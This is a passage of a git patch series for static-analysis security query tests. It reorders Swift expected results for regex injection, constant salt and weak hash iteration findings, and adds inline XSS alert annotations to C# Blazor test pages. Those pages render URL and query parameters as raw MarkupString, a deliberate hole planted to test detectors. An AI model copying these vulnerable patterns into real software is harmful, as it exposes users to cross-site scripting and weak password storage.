String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index d9388214b4b8..002454a3021d 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected @@ -1,22 +1,3 @@ -#select -| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | edges | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | @@ -72,3 +53,22 @@ nodes | test.swift:67:53:67:53 | constantSalt | semmle.label | constantSalt | | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths +#select +| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected index a0b4f7370321..aff512f05123 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected @@ -1,8 +1,3 @@ -#select -| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | -| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | edges | test.swift:20:45:20:45 | 99999 | test.swift:33:22:33:43 | call to getLowIterationCount() | provenance | | | test.swift:33:22:33:43 | call to getLowIterationCount() | test.swift:37:84:37:84 | lowIterations | provenance | | @@ -15,3 +10,8 @@ nodes | test.swift:44:84:44:84 | lowIterations | semmle.label | lowIterations | | test.swift:45:84:45:84 | 80000 | semmle.label | 80000 | subpaths +#select +| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | +| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | From d590687904c15c3793da65a909697d87fe8dd76d Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:25:03 +0000 Subject: [PATCH 11/15] Convert C# qlref tests to inline expectations --- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../all-platforms/blazor/XSS.qlref | 4 ++- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../blazor_build_mode_none/XSS.qlref | 4 ++- .../BlazorTest/Components/MyOutput.razor | 2 +- .../Components/Pages/TestPage.razor | 6 ++-- .../all-platforms/blazor_net_8/XSS.qlref | 4 ++- .../Components_Pages_TestPage_razor.g.cs | 4 +-- .../microsoft/aspnetcore/blazor/Name.cs | 4 +-- .../microsoft/aspnetcore/blazor/NameList.cs | 4 +-- .../microsoft/aspnetcore/blazor/NameList2.cs | 4 +-- .../microsoft/aspnetcore/blazor/Xss.qlref | 4 ++- .../BlockCodeResponseWrite.qlref | 1 + .../BlockCodeResponseWriteBad.aspx | 2 +- .../ASP/BlockCodeResponseWrite/test.aspx | 2 +- .../ComplexInlineCode/ComplexInlineCode.qlref | 1 + .../ComplexInlineCodeBad.aspx | 2 +- .../ASP/ComplexInlineCode/test.aspx | 2 +- .../NonInternationalizedText.qlref | 1 + .../NonInternationalizedTextBad.aspx | 2 +- .../ASP/NonInternationalizedText/test.aspx | 2 +- .../SplitControlStructure.qlref | 1 + .../SplitControlStructureBad.aspx | 2 +- .../ASP/SplitControlStructure/test.aspx | 2 +- .../EmptyPasswordInConfigurationFile.qlref | 1 + .../PasswordInConfigurationFile.qlref | 1 + .../PasswordInConfigurationFile/config.xml | 16 ++++----- .../CWE-011/ASPNetDebug.qlref | 1 + .../Security Features/CWE-011/bad1/Web.config | 2 +- .../Security Features/CWE-011/bad2/Web.config | 2 +- .../ASPNetMaxRequestLength.qlref | 1 + .../ASPNetMaxRequestLength/bad/Web.config | 4 +-- .../ASPNetPagesValidateRequest.qlref | 1 + .../ASPNetPagesValidateRequestBad.config | 4 +-- .../ASPNetRequestValidationMode.qlref | 1 + .../ASPNetRequestValidationModeBad.config | 2 +- .../CWE-020/UntrustedData.cs | 4 +-- .../CWE-020/UntrustedDataToExternalAPI.qlref | 4 ++- .../CWE-022/TaintedPath/TaintedPath.cs | 16 ++++----- .../CWE-022/TaintedPath/TaintedPath.qlref | 4 ++- .../CWE-022/ZipSlip/ZipSlip.cs | 22 ++++++------ .../CWE-022/ZipSlip/ZipSlip.qlref | 4 ++- .../CWE-022/ZipSlip/ZipSlipBad.cs | 4 +-- .../CWE-078/CommandInjection.cs | 16 ++++----- .../CWE-078/CommandInjection.qlref | 4 ++- .../CWE-079/StoredXSS/StoredXSS.cs | 4 +-- .../CWE-079/StoredXSS/StoredXSS.qlref | 4 ++- .../Security Features/CWE-079/XSSAsp/XSS.cs | 36 +++++++++---------- .../CWE-079/XSSAsp/XSS.qlref | 4 ++- .../CWE-079/XSSAsp/script.aspx | 6 ++-- .../CWE-079/XSSRazorPages/XSS.qlref | 1 + .../CWE-090/LDAPInjection.cs | 18 +++++----- .../CWE-090/LDAPInjection.qlref | 4 ++- .../CWE-091/XMLInjection/Test.cs | 4 +-- .../CWE-091/XMLInjection/XMLInjection.qlref | 4 ++- .../CWE-094/CodeInjection.cs | 8 ++--- .../CWE-094/CodeInjection.qlref | 4 ++- .../CWE-099/ResourceInjection.cs | 6 ++-- .../CWE-099/ResourceInjection.qlref | 4 ++- .../CWE-112/MissingXMLValidation.cs | 10 +++--- .../CWE-112/MissingXMLValidation.qlref | 4 ++- .../AssemblyPathInjection.qlref | 4 ++- .../CWE-114/AssemblyPathInjection/Test.cs | 4 +-- .../ExposureInTransmittedData.cs | 18 +++++----- .../ExposureInTransmittedData.qlref | 4 ++- .../CWE-209/ExceptionInformationExposure.cs | 14 ++++---- .../ExceptionInformationExposure.qlref | 4 ++- .../MissingASPNETGlobalErrorHandler.qlref | 1 + .../WebConfigOff/Web.config | 2 +- .../HardcodedSymmetricEncryptionKey.cs | 16 ++++----- .../HardcodedSymmetricEncryptionKey.qlref | 4 ++- .../CWE-338/InsecureRandomness.cs | 14 ++++---- .../CWE-338/InsecureRandomness.qlref | 4 ++- .../MissingAntiForgeryTokenValidation.cs | 4 +-- .../MissingAntiForgeryTokenValidation.qlref | 1 + .../NoHeader/MissingXFrameOptions.qlref | 1 + .../MissingXFrameOptions/NoHeader/Web.config | 2 +- .../CWE-548/ASPNetDirectoryListing.qlref | 1 + .../Security Features/CWE-548/web.config | 2 +- .../CWE-601/UrlRedirect/UrlRedirect.cs | 16 ++++----- .../CWE-601/UrlRedirect/UrlRedirect.qlref | 4 ++- .../CWE-601/UrlRedirect/UrlRedirect2.cs | 2 +- .../CWE-601/UrlRedirect/UrlRedirectCore.cs | 24 ++++++------- .../Security Features/CWE-611/Test.cs | 6 ++-- .../CWE-611/UntrustedDataInsecureXml.qlref | 4 ++- .../CWE-611/UseXmlSecureResolver.qlref | 4 ++- .../HttpCookiesCorrect/RequireSSL.qlref | 1 + .../RequireSSL/HttpCookiesCorrect/Web.config | 2 +- .../RequireSSLMissing/RequireSSL.qlref | 1 + .../RequireSSL/RequireSSLMissing/Web.config | 4 +-- .../CWE-643/XPathInjection.cs | 24 ++++++------- .../CWE-643/XPathInjection.qlref | 4 ++- .../CWE-730/ReDoS/ExponentialRegex.cs | 12 +++---- .../CWE-730/ReDoS/ReDoS.qlref | 4 ++- .../CWE-730/ReDoSGlobalTimeout/ReDoS.qlref | 4 ++- .../CWE-730/RegexInjection/RegexInjection.cs | 4 +-- .../RegexInjection/RegexInjection.qlref | 4 ++- .../CWE-807/ConditionalBypass.cs | 24 ++++++------- .../CWE-807/ConditionalBypass.qlref | 4 ++- .../Security Features/CWE-838/HtmlEncode.cs | 2 +- .../CWE-838/InappropriateEncoding.cs | 24 ++++++------- .../CWE-838/InappropriateEncoding.qlref | 4 ++- .../Security Features/CWE-838/SqlEncode.cs | 4 +-- .../Security Features/CWE-838/UrlEncode.cs | 2 +- 106 files changed, 337 insertions(+), 262 deletions(-) diff --git a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor index e583e6b2e9c6..5476d75ccf9b 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/MyOutput.razor @@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor index ac3ccbe19207..7a7a02ec222d 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor @@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref +++ b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor index e583e6b2e9c6..5476d75ccf9b 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/MyOutput.razor @@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor index ac3ccbe19207..7a7a02ec222d 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor @@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor index e583e6b2e9c6..5476d75ccf9b 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/MyOutput.razor @@ -2,7 +2,7 @@

    Value from InputText: @Value

    -

    Raw value from InputText: @(new MarkupString(Value))

    +

    Raw value from InputText: @(new MarkupString(Value))

    @* $ Alert[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor index ac3ccbe19207..7a7a02ec222d 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/BlazorTest/Components/Pages/TestPage.razor @@ -8,7 +8,7 @@

    Route parameter

    Go to: /test/@XssUrl

    Parameter from URL: @UrlParam

    -

    Raw parameter from URL: @((MarkupString)UrlParam)

    +

    Raw parameter from URL: @((MarkupString)UrlParam)

    @* $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 *@
    @@ -17,7 +17,7 @@

    Query parameter

    Go to: /test/?qs=@XssUrl

    Parameter from query string: @QueryParam

    -

    Raw parameter from query string: @(new MarkupString(QueryParam))

    +

    Raw parameter from query string: @(new MarkupString(QueryParam))

    @* $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r3 *@
    @@ -82,7 +82,7 @@
    - + @* $ Source[cs/web/xss]=r1 *@
    @code { diff --git a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref +++ b/csharp/ql/integration-tests/all-platforms/blazor_net_8/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs index 8732f8c7e4be..372ee49242fd 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Components_Pages_TestPage_razor.g.cs @@ -135,7 +135,7 @@ protected override void BuildRenderTree(global::Microsoft.AspNetCore.Components. __builder.AddContent(18, "Raw parameter from URL: "); __builder.AddContent(19, #nullable restore -(MarkupString)UrlParam +(MarkupString)UrlParam // $ Alert[cs/web/xss]=r1 $ Alert[cs/web/xss]=r1 #line default #line hidden @@ -185,7 +185,7 @@ protected override void 